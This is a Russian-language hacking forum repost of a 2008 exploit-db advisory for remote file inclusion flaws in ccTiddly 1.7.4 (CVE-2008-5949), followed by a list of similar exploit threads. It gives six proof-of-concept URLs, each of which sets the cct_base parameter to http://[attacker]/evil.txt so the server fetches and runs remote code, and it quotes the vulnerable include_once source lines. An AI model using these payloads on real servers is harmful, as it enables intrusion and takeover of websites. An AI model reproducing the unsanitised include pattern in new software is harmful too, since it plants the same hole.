Exploit ccTiddly 1.7.4 - 'cct_base' Remote File Inclusion

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7336
Проверка EDB
  1. Пройдено
Автор
CONDEMNED
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-5949
Дата публикации
2008-12-04
Код: 
/*

	$Id: cctiddly-1.7.4-rfi.txt,v 0.1 2008/12/04 04:12:20 cOndemned Exp $

	ccTiddly 1.7.4 (cct_base) Multiple Remote File Inclusion Vulnerabilities
	found by cOndemned
	
	download from : http://tiddlywiki.org/ccTiddly/ccTiddly_v1.7.4.zip
	
	Probably prior versions are vulnerable too...

	Greetz: ZaBeaTy, str0ke, TBH, Avantura

*/


0x01 :
	file : 
		/index.php
	poc : 
		http://[host]/[cctiddly_path]/index.php?cct_base=http://[attacker]/evil.txt?
	source :  

		18.	//includes
		19.	if(!isset($cct_base))
		20.		$cct_base = "";
		21.
		22.	include_once($cct_base."includes/header.php");
		23.	include_once($cct_base."includes/login.php");	
	
0x02 :

	file :
		/handle/proxy.php
	poc :
		http://[host]/[cctiddly_path]/handle/proxy.php?cct_base=http://[attacker]/evil.txt?
	source :

		3.	if(!isset($cct_base)) 
		4.		$cct_base= "../";
		5.	include_once($cct_base."includes/header.php");
		6.	include_once($cct_base."includes/config.php");

0x03 :

	file :
		/includes/header.php
	poc :
		http://[host]/[cctiddly_path]/handle/includes/header.php?cct_base=http://[attacker]/evil.txt?
	source :

		5.	if(!isset($cct_base)) 
		6.		$cct_base= "";
		7.	include_once($cct_base."includes/functions.php");
		8.	include_once($cct_base."includes/config.php");
		9.	include_once($cct_base."includes/pluginLoader.php");
		10.	include_once($cct_base."lang/".$tiddlyCfg['pref']['language']."/language.php");
		11.	//include is used because language file is included once in config.php file
		12.	include_once($cct_base."includes/tiddler.php");
		13.	include_once($cct_base."includes/user.php");

0x04 :

	file :
		/includes/include.php
	poc :
		http://[host]/[cctiddly_path]/includes/include.php?cct_base=http://[attacker]/evil.txt?
	source :

		3.	include_once($cct_base."includes/ccAssignments.php");

0x05 :

	file :
		/includes/workspace.php	
	poc :
		http://[host]/[cctiddly_path]/includes/workspace.php?cct_base=http://[attacker]/evil.txt?
	source :
		3.	include_once($cct_base."includes/header.php");
		4.	include_once($cct_base."includes/user.php");
		5.	include_once($cct_base."includes/tiddler.php");

0x06 :

	file :
		/plugins/RSS/files/rss.php
	poc :
		http://[host]/[cctiddly_path]/plugins/RSS/files/rss.php?cct_base=http://[attacker]/evil.txt?
	source :

		3.	include_once($cct_base."includes/header.php");
		
EoF.

# milw0rm.com [2008-12-04]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit ccTiddly 1.7.6 - Multiple Remote File Inclusions
Ответы
0
Просмотры
310
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Google Chrome < 31.0.1650.48 - HTTP 1xx base::StringTokenizerT<...>::QuickGetNext Out-of-Bounds Read
Ответы
0
Просмотры
644
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_ag_main.php' Crafted Arbitrary File Upload / Arbitrary Code Execution
Ответы
0
Просмотры
422
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Basic Analysis and Security Engine (BASE) 1.4.5 - '/admin/index.php?base_path' Remote File Inclusion
Ответы
0
Просмотры
374
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Basic Analysis and Security Engine (BASE) 1.4.5 - '/admin/base_useradmin.php?base_path' Remote File Inclusion
Ответы
0
Просмотры
385
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Basic Analysis and Security Engine (BASE) 1.4.5 - 'index.php?base_path' Remote File Inclusion
Ответы
0
Просмотры
384
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_user.php?base_path' Remote File Inclusion
Ответы
0
Просмотры
392
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_uaddr.php?base_path' Remote File Inclusion
Ответы
0
Просмотры
387
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_time.php?base_path' Remote File Inclusion
Ответы
0
Просмотры
385
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_sensor.php?base_path' Remote File Inclusion
Ответы
0
Просмотры
381
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу